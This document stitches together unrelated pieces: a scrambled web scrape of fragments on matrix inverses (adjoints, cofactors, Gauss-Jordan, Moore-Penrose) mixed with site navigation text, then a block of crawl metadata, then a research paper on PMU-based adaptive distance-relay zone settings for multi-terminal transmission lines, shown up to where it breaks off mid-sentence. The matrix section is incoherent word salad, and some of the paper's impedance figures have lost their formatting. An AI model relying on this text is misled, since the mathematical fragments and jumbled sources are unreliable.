A to set B is 2pq. A-1; write it separately, and you're done, The inverse matrix exists only for square matrices and it's unique. | A-1 ] all rights reserved. separate the desired inverse To find the Inverse of a 3 by 3 Matrix is a little critical job but can be evaluated by following few steps. resulting in (REDUCED) DIAGONAL FORM. The questions for the Inverse of matrix can be asked as, 1). The (i,j) cofactor of A is defined to be. If one of the pivoting elements is zero, then first interchange The following steps will produce the inverse of A, written A -1 . n-n in that order, with the goal of creating a copy Solution :-Hence exists. step is equivalent to step 2 on Pg 163 of our text Rolf, The first pivot encicled in red identity matrix Definition. C program to find Inverse of n x n matrix 2). abelian group augmented matrix basis basis for a vector space characteristic polynomial commutative ring determinant determinant of a matrix diagonalization diagonal matrix eigenvalue eigenvector elementary row operations exam finite group group group homomorphism group theory homomorphism ideal inverse matrix invertible matrix kernel linear algebra linear combination linearly … We say that A is invertible if there is an n × n matrix B such that elements in positions 1-1, 2-2, 3-3, continuing through Steps involved in the Example Ct) is called the adjoint of matrix a. The formula to find inverse of matrix is given below. The result of the second pivoting is below. A = We use this formulation to define the inverse of a matrix. = 5 – 2 – 21 = – 180. Insertion of n arithmetic mean in given two numbers, Important Questions CBSE Class 10 Science. The inverse of a 2×2 matrix take for example an arbitrary 2×2 matrix a whose determinant (ad − bc) is not equal to zero. equations. Let A be an n x n matrix. See our text (Rolf, Pg 163) for one example; below is another example : Note : THE MATRIX INVERSE METHOD for solving a system of equations will use Note the similarity between this method and GAUSS/JORDAN method, used to solve a system of equations. Row operations Det (a) does not equal zero), then there exists an n × n matrix. The inverse of a matrix is that matrix which when multiplied with the original matrix will give as an identity matrix. Below is the result of performing P1, so C program to find inverse of matrix 7). If this is the case, then the matrix B is uniquely determined by A, and is called the (multiplicative) inverse of A, denoted by A . The columns of the 3x3 identity matrix are colored blue Note : THE MATRIX INVERSE METHOD for solving a system of equations will use document.write(\"This page last updated on:\n\"+document.lastModified); Note 2 : Check out Prof McFarland's Note 3 : Compare the above 3 steps for See our text (Rolf, Pg 163) for one example; below is another example : Notice that is also the Moore-Penrose inverse of +.That is, (+) + =. Toggle Main Navigation RS Aggarwal Solutions for class 7 Math's, lakhmirsingh Solution for class 8 Science, PS Verma and VK Agarwal Biology class 9 solutions, Lakhmir Singh Chemistry Class 9 Solutions, CBSE Important Questions for Class 9 Math's pdf, MCQ Questions for class 9 Science with Answers, Important Questions for class 12 Chemistry, Madhya Pradesh Board of Secondary Education, Karnataka Secondary Education Examination Board, Differentiability of the function at a Point, Equation of normal to the curve at a given point, Equation of tangent line to a curve at a given point. from the above matrix: as you use row operations. A matrix 'A' of dimension n x n is called invertible only under the condition, if there exists another matrix B of the same dimension, such that AB = BA = I, where I is the identity matrix of the same order. Permutation of n object has some of repeated kind. Chapter 8. The following steps will produce the inverse of A, written A-1. The Relation between Adjoint and Inverse of a Matrix. the pivot (3-3 position) is now \"1\". Inverse of a matrix exists only if the matrix is non-singular i.e., determinant should not be 0. as in the example below. The inverse of a matrix. inverse of n*n matrix. It can be calculated by the following method: given the n × n matrix a, define b = bij to be the matrix whose coefficients are found by taking the determinant of the (n-1) × (n-1) matrix obtained by deleting the ith row and jth column of a. [ A | In ] For every m×m square matrix there exist an inverse of it. i.e., B = A -1 How to find Adjoint? F u and v be two functions of x, then the integral of product of these two functions is given by: If A and B are two finite set then the number of elements in either A or in B is given by, If A, B and C are three finite set then the number of elements in either set A or B or in C is given by. A-1 = Do solve NCERT text book with the help of Entrancei NCERT solutions for class 12 Maths. where the adj (A) denotes the adjoint of a matrix. Pivot on matrix P2. The inverse of a square n× n matrix A, is another n× n matrix denoted by A−1such that AA−1= A−1A = I where I is the n × n identity matrix. The matrix has the inverse if and only if it is invertible. Conventionally, a g-inverse of A is denoted by A-.In the sequel the statement \"G is an A-\" means that G is a g-inverse of A.So does the … The result of the third (and last) pivoting is below with augmented matrix will be the desired inverse, Not all square matrices have an inverse matrix. Elements of the matrix are the numbers which make up the matrix. where i is the identity matrix. Thus, our final step is to interactivePIVOT ENGINE That is, multiplying a matrix by its inverse produces an identity matrix. C Program to Find Inverse Of 3 x 3 Matrix 4). A non zero square matrix ‘A’ of order n is said to be invertible if there exists a unique square matrix ‘B’ of order n such that, A.B = B.A = I The matrix 'B' is said to be inverse of 'A'. C program to find inverse of a matrix 3). One is to use Gauss-Jordan elimination and the other is to use the adjugate matrix. Adjoint can be obtained by taking transpose of cofactor matrix of given square matrix. We follow definition given above. of P2 [ A | In ] Many classical groups (including all finite groups ) are isomorphic to matrix groups; this is the starting point of the theory of group representations . C Program to Find Inverse Of 4 x 4 Matrix 4). the 3x3 identity Example 1 : Find the inverse (if it exists) of the following:  1 2-2 Let be an m-by-n matrix over a field , where , is either the field , of real numbers or the field , of complex numbers.There is a unique n-by-m matrix + over , that satisfies all of the following four criteria, known as the Moore-Penrose conditions: + =, + + = +, (+) ∗ = +,(+) ∗ = +.+ is called the Moore-Penrose inverse of . Here you will get C and C++ program to find inverse of a matrix. C program to find inverse of matrix 7). C Program to find the Inverse of a Matrix 6). Inverse of a matrix. The n × n matrices that have an inverse form a group under matrix multiplication, the subgroups of which are called matrix groups. Formula to find inverse of a matrix. C Program to calculate inverse of a matrix 5). Matrix Calculator have all matrix functions having 'm' rows and 'n' columns. C Program to find the Inverse of a Matrix 6). Below is the result of performing Note the similarity Definition :-Assuming that we have a square matrix a, which is non-singular (i.e. The matrix below is NOT A-1 a non-zero pivot element, then the matrix A has no inverse. Below are the row operations of P2 Finally multiply 1/deteminant by adjoint to get inverse. Remember it must be true that: A × A-1 = I. as they re-appear on the left side Finding Inverse of 2 x 2 Matrix. A matrix that has no inverse is singular. Then calculate adjoint of given matrix. The inverse is: the inverse of a general n × n matrix a can be found by using the following equation. So, let us check to see what happens when we multiply the matrix by its inverse: And, hey!, we end up with the Identity Matrix!\n\nNone Found\n\nCategories" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8824209,"math_prob":0.9959956,"size":15253,"snap":"2021-04-2021-17","text_gpt3_token_len":3912,"char_repetition_ratio":0.1884058,"word_repetition_ratio":0.120354585,"special_character_ratio":0.25070477,"punctuation_ratio":0.10566615,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9998497,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-15T08:24:27Z\",\"WARC-Record-ID\":\"<urn:uuid:cf6d072a-3933-45f4-a7ba-726be4c67a2f>\",\"Content-Length\":\"48903\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:eaa9861f-d29c-4b4c-a057-96b1340761ca>\",\"WARC-Concurrent-To\":\"<urn:uuid:251cb6ca-d399-4ba3-9e78-1d77c0b0709c>\",\"WARC-IP-Address\":\"185.148.72.222\",\"WARC-Target-URI\":\"https://www.travel-rs.info/5n6ryh35/article.php?7a495e=inverse-of-n-n-matrix\",\"WARC-Payload-Digest\":\"sha1:BQZH6AMPAAF2ACLBRNQQNEGOZQ2LC7JF\",\"WARC-Block-Digest\":\"sha1:GWGLLC6WEKM3PFNVYRAWTV27GJHLPVHX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038084601.32_warc_CC-MAIN-20210415065312-20210415095312-00386.warc.gz\"}"}
https://pcmp.springeropen.com/articles/10.1186/s41601-018-0087-z
[ "# PMU based adaptive zone settings of distance relays for protection of multi-terminal transmission lines\n\n## Article metrics\n\n• 1307 Accesses\n\n• 1 Citations\n\n## Abstract\n\nThis paper proposes Phasor Measurement Unit (PMU) based adaptive zone settings of distance relays (PAZSD) methodology for protection of multi-terminal transmission lines (MTL). The PAZSD methodology employs current coefficients to adjust the zone settings of the relays during infeed situation. These coefficients are calculated in phasor data concentrator (PDC) at system protection center (SPC) using the current phasors obtained from PMUs. The functioning of the distance relays during infeed condition with and without the proposed methodology has been illustrated through a four-bus model implemented in PSCAD/EMTDC environment. Further, the performance of the proposed methodology has been validated in real-time, on a laboratory prototype of Extra High Voltage multi-terminal transmission lines (EHV MTL). The phasors are estimated in PMUs using NI cRIO-9063 chassis embedded with data acquisition sensors in conjunction with LabVIEW software. The simulation and hardware results prove the efficacy of the proposed methodology in enhancing the performance and reliability of conventional distance protection system in real-time EHV MTLs.\n\n## Introduction\n\nTransmission lines are occassionally tapped to provide intermediate connections to loads or reinforce the underlying lower voltage network through a transformer. Such a configuration is known as multi-terminal transmission lines. For strengthening the power system, MTLs are frequently designed as a temporary and inexpensive measure. However, they can cause problems in the protective system .\n\nAs a part of a continuous endeavor to eliminate the problems caused by MTLs and enhance the reliability of the protective system, many protection methodologies have been developed. A few of them are discussed here. Abe et al. developed asynchronous measurements based protection methodology for fault location in MTLs. The MTLs have been transformed into two terminal lines to achieve fault location accurately. Nagasawa et al. have proposed an algorithm for protection of parallel MTLs using asynchronous differential currents at each terminal. Though the algorithms proposed by the authors [2, 3] performed well, their accuracy may be affected by unbalance in the line parameters when different fault conditions occur. Funbashi et al. have proposed methods to identify the fault point in double circuit MTL using measurements from capacitor voltage transformer (CCVT) and current transformer (CT). However, for accurate fault location, measurements are required from all the terminals. In , Qiu et al. have developed a multi-agent algorithm for protection of MTLs. It consists of organization agent, coordination agent and executive agent. They exchange the information among themselves regarding trip information. However, lack of global synchronous measurements acquired from different agents may lead to mal-operation of the relay. Gajic et al. have proposed differential protection with innovative charging current compensation algorithm for MTL protection. However, the reliability of the algorithm depends on the availability of the current channels.\n\nForford et al. have designed differential current algorithm for protection of MTLs. The proposed algorithm can differentiate internal fault, external fault and normal load conditions using electric mid-point (EMP). Arbes has developed differential line protection scheme for the protection of double lines, tapped lines and short lines. However, the performance of the proposed scheme depends on the local voltage and current measurements. Al-Fakhri has proposed differential protection methodology against internal and external faults using asynchronous measurements. Hussain et al. have proposed a fault location scheme for MTLs using positive sequence voltage and current measurements. However, the synchronization process may be affected due to metering errors. For reliable operation of proposed methods [9, 10], the precise time synchronization of analog information between the line ends must be required for the differential calculation to be accurate.\n\nIn addition to voltage and current based methodologies [2,3,4,5,6,7,8,9,10], traveling wave-based protection schemes have been proposed for MTL protection [11, 12]. Authors of have used single traveling wave and fundamental measurements for fault location in MTLs. However, the performance of the methodology will be affected by arcing faults and variation in fault impedance. In , Zhu et al. developed a current traveling wave based algorithm. Fault detection and location functions are accomplished using arrival time of current waves at a terminal.\n\nTechnological developments in measurements, communication, control and monitoring of power grids have brought a paradigm shift in the protection philosophy of transmission lines. The reliability of power system has been enhanced by early detection of wide-area disturbances and optimal utilization of assets. Some of the protection methodologies based on Synchrophasor measurements are discussed here. Lin et al. demonstrated the performance of PMU based fault location algorithm on MTLs. Faults are identified and located using synchronized positive sequence voltage and current phasors. Further, for accurate fault detection and location in MTLs, Brahma has employed time-stamped voltage and current phasors obtained from all the terminals. Ting Wu et al. have formed a novel fault location technique for multi-section non-homogeneous transmission lines. However, the accuracy of [14, 15] may be lost in case of medium and long MTLs. For decades, the distance protection is widely employed for the protection of transmission lines as it is simple and fast. The distance protection can protect most of the protected line, and it is virtually independent of the source impedance. However, the performance and the reliability of the distance protection are influenced by infeed and outfeed currents in MTLs [16,17,18].\n\nIn this paper, PMU based adaptive zone settings of distance relays (PAZSD) methodology has been proposed to improve the performance and the reliability of distance protection by adjusting zone settings adaptively. The PAZSD methodology employs current coefficients to adjust the zone settings of the distance relays during infeed situations. These coefficients are calculated in phasor data concentrator (PDC) at system protection center (SPC) using the magnitude of current phasors obtained from PMUs. The functioning of the distance relays during infeed condition with and without the proposed methodology has been demonstrated through different fault case studies carried out on a four-bus model in PSCAD/EMTDC environment. Further, a laboratory prototype of EHV MTLs is considered to validate the performance of distance relays during infeed condition. For phasor estimation, PMUs are realized in real-time using NI cRIO-9063 chassis embedded with data acquisition sensors (NI-9225 & NI-9227) and Global Positioning System (GPS) synchronisation module (NI-9467) in conjunction with LabVIEW software. The results indicate that the proposed PAZSD methodology can improve the performance and the reliability of conventional distance protection during infeed situations under different fault conditions.\n\n## Synchrophasor Technology\n\nThe cutting-edge Synchrophasor technology entails estimation of time-stamped phasor measurements on GPS time reference. It has been used to provide accurate information regarding the state of the power system for implementing immediate corrective actions. The process of phasor estimation starts with a sampling of an analog signal (x(t)) at a sampling frequency fs (= Nfo). With this sampling frequency, N number of samples per cycle are obtained. The time-stamped fundamental phasors of three-phase voltage and current signals per cycle are estimated using the Discrete Fourier Transform (DFT) . In general, the kth estimation of the original signal is given by Eq. 1.\n\n$${X}_k=\\frac{\\sqrt{2}}{N}\\sum \\limits_{n=0}^{N-1}x\\left(n\\Delta T\\right){e}^{-j\\frac{2\\pi kn}{N}}$$\n(1)\n\nwhere x(n∆T) is sampled version of x(t) (voltage or current analog signals),\n\n∆T is sampling time in seconds,\n\nfo is nominal frequency (Hz),\n\nT is time period in seconds,\n\nN is number of samples per cycle,\n\nn is sample number starting from n = 0 to N-1,\n\nFor k = 1, X k gives the fundamental frequency phasor.\n\nA concise description of the infeed problem encountered by distance protection in MTLs and proposed solution (PAZSD methodology) under different fault conditions are discussed in the following section.\n\n## Methods\n\nFig. 1 shows a part of an interconnected power system for illustrating the effect of infeed on the performance of distance relays. Let the distance relays protecting the lines i-l and l-j are R il & R li , and R lj & R jl respectively. Likewise, the distance relays of the teed terminal l-k are R lk and R kl . Assume PMUs are installed at all the buses which communicate to the PDC at SPC through a modem and fiber optical cables. Assuming the currents Ip and Iq are in phase. For illustration purpose, the PMUs at Bus i and k are considered.\n\n### Infeed effect\n\nIn order to explain the infeed effect, only relays are assumed to be present in the above power system network (No PMUs, PDC and SPC are present). Assume that a fault has occurred on the line l-j at a point D as shown in Fig. 1. The resultant currents are indicated in Fig. 1. Under such conditions, the impedance observed by the relay R il at Bus i is obtained using KVL:\n\n$${V}_i={I}_p\\left({Z}_{il}+{Z}_{lD}\\right)+{I}_q{Z}_{lD}$$\n(2)\n$$\\frac{V_i}{I_p}=\\left({Z}_{il}+{Z}_{lD}\\right)+\\frac{I_q}{I_p}{Z}_{lD}$$\n(3)\n$$\\mathrm{Let}\\kern1.25em {Z}_{il}+{Z}_{lD}={Z}_{iD}$$\n$$\\frac{V_i}{I_p}={Z}_{iD}+\\kern0.5em \\frac{I_q}{I_p}{Z}_{lD}$$\n(4)\n\nwhere.\n\nV i is voltage at a Bus i,\n\nZ il is the impedance of transmission line i-l,\n\nZ lD is impedance of transmission line l-j from Bus l to the fault point D,\n\nI p is current flowing from Bus i to l,\n\nI q is current flowing from Bus k to l,\n\nFrom Eq. (4), it is observed that the impedance seen by the relay R il is more than the impedance observed (Z iD ) when there is infeed. Therefore, the relay R il under reaches during fault condition. The main cause for such phenomenon is that the relay R il cannot sense the current (I q ) flowing from Bus k to l. The amount of under reach depends on the magnitude of current I q .\n\nTo address the above infeed issue and to ensure reliable operation of the relay R il , the subsequent section proposes the PAZSD methodology. This proposed methodology guides the relay to change the zone settings according to the infeed conditions using Synchrophasor technology. The PAZSD methodology which is executed in the PDC sends the new zone settings to the corresponding relay to ensure reliable operation during the infeed condition.\n\n### Flowchart of proposed PAZSD methodology\n\nThe sequence of execution of the proposed PAZSD methodology, as shown in Fig. 1, is illustrated in step by step manner to eliminate the infeed problem as discussed in the previous section.\n\nStep 1: Synchronized time-stamped voltage and current phasor data are estimated in the PMU at Bus i and k, and transmitted to PDC at SPC.\n\nStep 2: In PDC, three-phase current coefficients (K1, K2 and K3) are calculated from the magnitudes of the current phasors using Eqs. (5) to (7)\n\n$${K}_1=\\frac{\\mid {I}_{Ri}\\mid +\\mid {I}_{Rk}\\mid }{\\mid {I}_{Ri}\\mid }$$\n(5)\n$${K}_2=\\frac{\\mid {I}_{Yi}\\mid +\\mid {I}_{Yk}\\mid }{\\mid {I}_{Yi}\\mid }$$\n(6)\n$${K}_3=\\frac{\\mid {I}_{Bi}\\mid +\\mid {I}_{Bk}\\mid }{\\mid {I}_{Bi}\\mid }$$\n(7)\n\nStep 3: If K1 ≈ K2 ≈ K3, adjust the reach settings of the relay R il using Eq. (8).\n\n$${Z}_{\\mathrm{set}\\hbox{-} \\mathrm{new}}={K_1}^{\\ast }\\ {Z}_{\\mathrm{set}\\hbox{-} \\mathrm{old}}$$\n(8)\n\nElse if K1> (K2 & K3), adjust the reach settings of the relay R il using Eq. (9).\n\n$${Z}_{\\mathrm{set}\\hbox{-} \\mathrm{new}}={K_1}^{\\ast }\\ {Z}_{\\mathrm{set}\\hbox{-} \\mathrm{old}}$$\n(9)\n\nElse if K2> (K1 & K3), adjust the reach settings of relay R il as given in Eq. (10).\n\n$${Z}_{\\mathrm{set}\\hbox{-} \\mathrm{new}}={K_2}^{\\ast }\\ {Z}_{\\mathrm{set}\\hbox{-} \\mathrm{old}}$$\n(10)\n\nElse adjust the reach settings of the relay R il as given in Eq. (11).\n\n$${Z}_{\\mathrm{set}\\hbox{-} \\mathrm{new}}={K_3}^{\\ast }\\ {Z}_{\\mathrm{set}\\hbox{-} \\mathrm{old}}$$\n(11)\n\nwhere.\n\nK1K2K3 are current cofficients for infeed condition,\n\nI Ri , I Yi & I Bi are three-phase current phasors flowing from Bus i to l,\n\nI Rk , I Yk & I Bk are three-phase current phasors flowing from Bus k to l,\n\nZset-old are old three zone reach settings of the relay R il ,\n\nZset-new are new three-zone reach settings of the relay R il with infeed line (between Bus k and l).\n\nThe following section describes the implementation of the proposed PAZSD methodology on a four-bus system to eliminate the infeed problems as discussed in section 3.1.\n\n### Case studies\n\nA four-bus model shown in Fig. 2 is considered and implemented in PSCAD/EMTDC software. Various case studies (Case 1, Case 2 and Case 3) are conducted to illustrate the functioning of distance relays for infeed condition. The base MVA and kV of the system are 100 and 400 (line to line) respectively. The positive sequence resistance, inductive and capacitive reactance of the transmission line are 0.0234 Ω/km, 0.298 Ω/km, and 256.7 kΩ*km respectively. The values of negative sequence parameters are same as that of the positive sequence parameters. Similarly, the values of zero sequence resistance, inductive and capacitive reactance of the transmission lines are 0.388 Ω/km, 1.02 Ω/km, and 376.6 kΩ*km respectively. The length of each transmission line is 350 km. The zone settings of the distance relays are given in Table 1. Assume PMUs are installed at all buses.\n\n#### Performance of distance relays without PAZSD methodology during infeed condition\n\nThree case studies (Case 1, Case 2 and Case 3), as shown in Fig. 2, are considered to illustrate the performance of the distance relay R12 without PAZSD methodology. Assuming that no PMU, PDC and SPC technology are present in the case studies.\n\n### Case 1\n\nAssume that a triple line fault (RYB) occurred at a distance of 10 km from Bus-1. In other words, in Zone-1 of the relay R12 and Zone-2 of the relay R21. For such condition, the impedance trajectory of the distance relays, R12, R21, and R23, is portrayed in Fig. 3.\n\nFrom Fig. 3, the relays R12 and R21 have observed the impedance in Zone-1 and Zone-2 respectively. Whereas, the relay R23 has not observed the impedance in any of its zones. Hence, it is clear that none of the relays are affected by the infeed condition and the respective relays have correctly detected a fault condition.\n\n### Case 2\n\nA double line to ground fault (RYG) is created at a distance of 500 km from Bus-1 (i.e., 150 km from Bus-2). This indicates the relays R12 and R23 should detect the fault in Zone-2 and Zone-1 respectively. The corresponding impedance trajectory of the relays R12, R21 and R23 is shown in Fig. 4. From Fig. 4, it is observed that the relay R12 has observed the trajectory in Zone-3 whereas the relay R23 has observed in Zone-1. The relay R21 has not observed the trajectory in any of its zone due to its inherent directional property. Therefore, it is understood that the infeed at Bus-2 has caused the relay R12 to mal-operate.\n\n### Case 3\n\nA double line fault (RY) is created at a distance of 200 km from Bus-2 which lies in Zone-3 of the relay R12 and Zone-1 of the relay R23. For this event, impedance trajectory observed by the relays, R12, R21 and R23 are shown in Fig. 5. From figure, it is concluded that the relays R12 and R21 have not seen the impedance in any of their zones. Whereas, the relay R23 has seen the impedance in Zone-1. Therefore, it is clearly known that the infeed at Bus-2 has influenced the relay R12 to mal-operate.\n\nFrom the above three case studies, it is clear that the performance of the relay is affected by the infeed at Bus-2 when a fault occurs on the line 2–3.\n\n#### Performance of distance relays with proposed PAZSD methodology during infeed condition\n\nThe case studies discussed in the previous subsection are reconsidered with the implementation of the proposed PAZSD methodology using PMUs and PDC. The same four-bus system is considered, and the proposed PAZSD methodology is implemented in PDC at SPC with the data acquired from each PMU. Once the current coefficients (K1, K2, and K3) are estimated in PDC, the new zone settings are calculated and communicated back to the corresponding relay. The following case studies prove the advantages of the proposed methodology to eliminate the infeed problem discussed in the previous section.\n\n### Case 1\n\nA triple line fault (RYB) is created with the same fault conditions as discussed in section 3.3.1.1. The relay zone settings (Zset-old) are shown in Table 2. The current coefficients (K1, K2, and K3) and new zone settings estimated for the above fault condition are tabulated in Table 2 (according to the methodology proposed in section 3.2). These new zone settings are updated in the respective relays, and the relay operate as per the new settings. The impedance trajectory of the distance relays, R12, R21, and R23 is portrayed in Fig. 6. From Fig. 6, the relays R12 and R21 have observed the impedance in Zone-1 and Zone-2 respectively. Whereas, the relay R23 has not observed the impedance in any of its zones. Hence, it is clear that none of the relays are affected by the infeed condition and the respective relays have properly detected the fault condition with new zone settings.\n\n### Case 2\n\nA double line to ground fault (RYG) is considered with same fault conditions as discussed in section 3.3.1.2. The estimated current coefficients (K1, K2, and K3) and new zone settings and tabulated in Table 2. The values of current coefficients K1, K2 and K3 are 1.82, 1.79 and 1.9 respectively. Since K3 > (K1 & K2), as per the proposed methodology the new zone settings of the relay R12 (Relayset-new = K3*Relayset-old) are 12.449 + j158.536, 23.342+ j297.255 and 32.678+ j416.157. The impedance trajectory of relays R12, R21 and R23 are shown in Fig. 7, and it is clear that the relay R12 has detected the fault in Zone-2. From these case studies (3.3.1.2 & 3.3.2.2) it is observed that because of implementation of the proposed methodology, the relay R12 could detect the fault condition in Zone-2 (instead of Zone-3), which averts the mal-operation of the relay.\n\n### Case 3\n\nA double line fault (RY) is considered with same fault conditions as discussed in section 3.3.1.3. The current coefficients (K1, K2, and K3) and new zone settings estimated for the above fault condition are tabulated in Table 2. The values of the current coefficients K1, K2 and K3 are 1.8, 1.78 and 1.89 respectively. Since K3 > (K1 & K2), as per the proposed methodology the zone settings of the relay R12 (Relayset-new = K3*Relayset-old) are 12.383 + j157.702, 23.219 + j295.691 and 32.506 + j413.967. The impedance trajectory is shown in Fig. 8 and it is clear that the relay R12 has detected the fault in Zone-3. From these case studies (3.3.1.3 & 3.3.2.3) it is observed that because of implementation of the proposed methodology the relay R12 could detect the fault condition properly in Zone-3, which averts the mal-operation of the relay.\n\nFrom the above case studies, it is understood that the performance of the relay R12 is satisfactory with new zone settings when a fault occurs on the line 1–2. However, the performance of the relay R12 has been corrected by the proposed PAZSD methodology when a fault occurs on the line 2–3. Therefore, the performance of distance relay (R12) has been enhanced during the infeed condition with the help of the proposed methodology.\n\nIn the subsequent section, the efficacy of the proposed PAZSD methodology in enhancing the performance and reliability of the distance relay is validated in real-time on a laboratory prototype model of EHV MTL.\n\n## Results and discussion\n\nA scale down laboratory prototype model of EHV MTL is shown in Fig. 9. As shown in figure, two three-phase 440 V, 50 Hz power supplies are connected to Bus B1 and B4 through autotransformers. The autotransformer steps down the supply voltage from 440 V to 110 V at 50 Hz. A three-phase variable load of 3.75 kW is connected at the receiving end (Bus B3). PMUs are connected at all buses.\n\nThe length of the transmission lines 1–2 and 2–3 is 200 km each with the Π-model transmission line. Each 200 km transmission line is divided into four 50 km Π-sections connected in series. The parameters of the transmission line per 50 km are considered with resistance 1.8 Ω, inductance 10.07 mH and capacitance 2.2 μF. PMUs are implemented using NI cRIO-9063 chassis embedded with NI-9225 Voltage, NI-9227 Current and NI-9476 GPS modules programmed in LabVIEW FPGA software. As shown in Fig. 9, the three-phase voltage and current phasors are acquired from PMUs and communicated to the PDC. The sampling frequency of NI cRIO-9063 considered for phasor estimation is 2 kHz. To evaluate the performance of distance relay (RA), numerous faults with different fault impedances (0.2 Ω, 1.7 Ω, and 4.9 Ω) are simulated and discussed in the following section.\n\n### Real-time performance analysis of the conventional distance relay without PAZSD methodology\n\nThe zone settings of the relay RA are calculated for 400 km and tabulated in Table 3.\n\nThe following conditions are used to detect the zone of fault point.\n\n$$\\mathrm{Zone}\\hbox{-} 1:\\kern1em \\mathrm{If}\\mid {\\mathrm{Z}}_{\\mathrm{Calculate}\\hbox{-} 1}\\mid <11.647$$\n(1)\n\nwhere |ZCalculate-1| is the distance from the center of Zone-1 circle to the fault point.\n\n$$\\mathrm{Zone}\\hbox{-} 2:\\kern1em \\mathrm{If}\\ 11.647<\\mid {\\mathrm{Z}}_{\\mathrm{Calculated}\\hbox{-} 2}\\mid <21.8388$$\n(2)\n\nwhere |ZCalculate-2| is the distance from the center of Zone-2 circle to the fault point.\n\nThe performance of the distance relay RA without the proposed methodology is evaluated for various faults with different fault impedances (0.2 Ω, 1.7 Ω and 4.9 Ω) and tabulated in Tables 4, 5 and 6.\n\nFrom Table 4, for example, consider an LG fault occurred at 50 km from Bus B1. The corresponding impedance observed by the relay RA is 3.961265.2140. The relay RA has seen the impedance in Zone-1 since the magnitude of the impedance is less than 11.647 (Condition 1). Therefore, the relay operates as per its settings. Figure 10 displays the LabVIEW front panel for relay RA in PDC at SPC (without the proposed methodology). For the case study, LabVIEW front panel displays a glowing LED for Zone-1 fault. Figure 10 also shows the voltage and current phasor data acquired from PMUs at B1 and B4, and the calculated impedance. A similar explanation holds good for LL fault at 50 km, LLG & LLL faults at 150 km from Bus B1 as given in Table 4.\n\nFurther, consider double line fault (LL) at 250 km from Bus B1 as given in Table 4. The impedance observed by the relay RA is 32.09284.440. The relay RA has seen the impedance in Zone-2 since the magnitude of the calculated impedance (|ZCalculated-2|) is less than 21.8388 (Condition 2). Therefore, the relay operates in Zone-2 rather than in Zone-1. Thus, the infeed at Bus B2 has caused the relay RA to mal-operate. A similar explanation holds good for LG, LLG & LLL faults at 250 km from Bus B1 as given in Table 4.\n\nFurthermore, consider the double line to ground fault (LLG) at 300 km from Bus B1 as given in Table 4. The impedance observed by the relay RA is 48.13680.370. The relay RA has seen the impedance neither in Zone-1 nor in Zone-2 since the magnitude of the calculated impedance (|Z Calculated|) is higher than 21.8388 (Condition 2). Therefore, the relay does not operate since the observed impedance has fallen out of its zone settings. Thus, the infeed at Bus B2 has caused the relay RA to mal-operate. A similar explanation holds good for LG, LL & LLL faults at 350 km from Bus B1 as given in Table 4. The fault conditions for all the cases are shown in Table 4 considering a fault resistance of 0.2 Ω at the fault point.\n\nTables 5 and 6 show similar case studies as discussed in Table 4 but with different FR of 1.7 Ω and 4.9 Ω respectively. From tables, it is clear that with the change in FR the relay RA malfunctions for many cases because of infeed condition at Bus B2. Few cases are discussed below.\n\nConsider double line fault (LL) at 250 km from Bus B1 as given in Table 5. The impedance observed by the relay RA is 32.09284.440. The relay RA has seen the impedance in Zone-2 since the magnitude of the calculated impedance (|Z Calculated-2|) is less than 21.8388 (Condition 2). Therefore, the relay operates in Zone-2 rather than in Zone-1. Thus, the infeed at Bus B2 has caused the relay RA to mal-operate. Figure 11 displays the LabVIEW front panel for relay RA in PDC at SPC (without the proposed methodology). The LabVIEW front panel displays glowing LED for Zone-2 fault. Figure 11 also shows the voltage and current phasor data acquired from PMUs at B1 and B4 and the calculated impedance.\n\nConsider a double line to ground fault (LLG) with FR of 4.9 Ω at 350 km from Bus B1 as given in Table 6. The impedance observed by the relay RA is 80.33568.630.\n\nThe relay RA malfunctions because the impedance observed by the relay is greater than 21.8388 (distance from the center of the Zone-2 circle to the fault point). A LabVIEW front panel display for this case study is shown in Fig. 12. Figure 12 also displays the LabVIEW front panel for relay RA in PDC (without the proposed methodology). The voltage and current phasor data acquired from PMUs at B1 and B4, and the calculated impedances are also shown in Fig. 12.\n\nThe subsequent section presents the performance of the distance relay RA when the proposed methodology has been implemented at SPC.\n\n### Real-time performance analysis of the conventional distance relay with PAZSD methodology\n\nThe following conditions are used to detect the zone of fault point using the proposed PAZSD methodology.\n\n$$\\mathrm{Zone}\\hbox{-} 1:\\kern1em \\mathrm{If}\\mid {\\mathrm{Z}}_{\\mathrm{Calculate}\\hbox{-} 1}\\mid <\\left(|{\\mathrm{Z}}_{\\mathrm{new}}{\\_}_{\\mathrm{Z}\\mathrm{one}1}|/2\\right)$$\n(3)\n$$\\mathrm{Zone}\\hbox{-} 2:\\kern1em \\mathrm{If}\\ \\left(|{\\mathrm{Z}}_{\\mathrm{new}}{\\_}_{\\mathrm{Z}\\mathrm{one}1}|/2\\right)<\\mid {\\mathrm{Z}}_{\\mathrm{Calculated}\\hbox{-} 2}\\mid <\\left(|{\\mathrm{Z}}_{\\mathrm{new}}{\\_}_{\\mathrm{Z}\\mathrm{one}2}/2\\right)$$\n(4)\n\nIn this subsection, the enhanced functioning of the distance relay RA with PAZSD methodology for the same case studies (studied in subsection 4.1) is discussed. The new zone settings of the relay RA using the current coefficients (K1, K2 & K3) for different faults with different fault conditions are tabulated in Tables 7, 8 and 9.\n\nFrom Table 7, for the LG with the same fault conditions as discussed in subsection 4.1, the current coefficients K1, K2 & K3 estimated by the proposed methodology are 1.2656, 1.6712 & 1.5703 respectively. Since K2 > (K1 & K3), the new zone settings of the relay RA as per the proposed methodology are 38.93060.36° and 72.99460.36°. For this condition, the impedance observed by the relay RA is 4.01163.5990. The zone of fault detection is Zone-1 since the magnitude of the observed value is less than 18.29 (Condition 3). Therefore, the operation of the relay RA with new zone settings is same as with the old zone settings. Figure 13 displays the LabVIEW front panel for relay RA in PDC at SPC (with the proposed methodology). The LabVIEW front panel displays glowing LED against Zone-1 fault. Figure 13 also shows the voltage and current phasors acquired from PMUs at B1 and B4 and the calculated impedance. A similar explanation holds good for LL fault at 50 km, and LLG & LLL faults at 150 km from bus B1 as given in Table 7.\n\nSimilarly, for double line fault (LL) with the same fault conditions as discussed in subsection 4.1, the current coefficients K1, K2 & K3 estimated by the proposed methodology are 